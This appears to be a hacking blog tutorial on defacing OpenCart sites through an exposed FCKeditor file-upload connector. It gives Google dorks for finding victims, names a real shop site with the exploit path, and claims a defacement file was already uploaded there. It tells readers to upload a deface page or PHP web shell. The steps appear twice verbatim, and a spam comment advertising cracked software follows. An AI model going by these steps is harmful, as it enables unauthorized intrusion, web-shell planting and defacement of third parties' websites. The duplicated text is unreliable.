Wordpress fckeditor upload Vulnerability Upload Your Deface Remotely
This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here
1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
http://www.schoolshopper.com.au/
Then i'll will simply add the vuln URL after the website
Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now a Page will be open Like This
Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html
comment here if you have any problem in this tut
some demo for Practice (maybe some websites patched its my old collection so... )
1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
http://www.schoolshopper.com.au/
Then i'll will simply add the vuln URL after the website
Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now a Page will be open Like This
Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html
comment here if you have any problem in this tut
some demo for Practice (maybe some websites patched its my old collection so... )
1 comments:
I learned your article. its very impressive. thank to share for this posting.
cracked software download
Post a Comment